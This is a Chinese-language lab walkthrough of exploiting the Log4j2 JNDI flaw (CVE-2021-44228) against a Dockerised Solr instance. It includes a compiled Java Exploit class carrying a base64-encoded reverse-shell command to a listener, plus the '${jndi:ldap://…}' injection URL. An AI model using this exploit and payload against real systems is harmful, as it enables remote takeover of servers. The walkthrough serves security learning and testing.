Log4j2-CVE-2021-44228
一、环境搭建
机器:kali Linux
Java:jdk8
python:python3.7.x
二、在docker里面搭建靶机环境
三、访问
四、构造payload
五、替换
将上面构造好的反弹shell语句替换
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
???? public Exploit(){
???????????? try{
???????????????? Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
??????????????????????????????? }catch(Exception e){
??????????????????????????????????????????? e.printStackTrace();
???????????????????????????????????????????? }
??????????????? }
???????? public static void main(String[] argv){
???????????????????????? Exploit e = new Exploit();
??????????????????????????? }
}?
将上面文件放进Exploit.java文件,在Windows用javac进行编译成Exploit.class,记得切换成 jdk8!
然后放进kali里面查看
六、开启恶意站点
用python在含有java.class开启http服务
访问一下,看看效果
七、用marshalsec-0.0.3-SNAPSHOT-all.jar插件开启LADP监听
八、开启监听端口
九、传入恶意参数
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://192.168.217.128:1389/Exploit}
十、查看效果
如上图所示即反弹shell成功!?
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!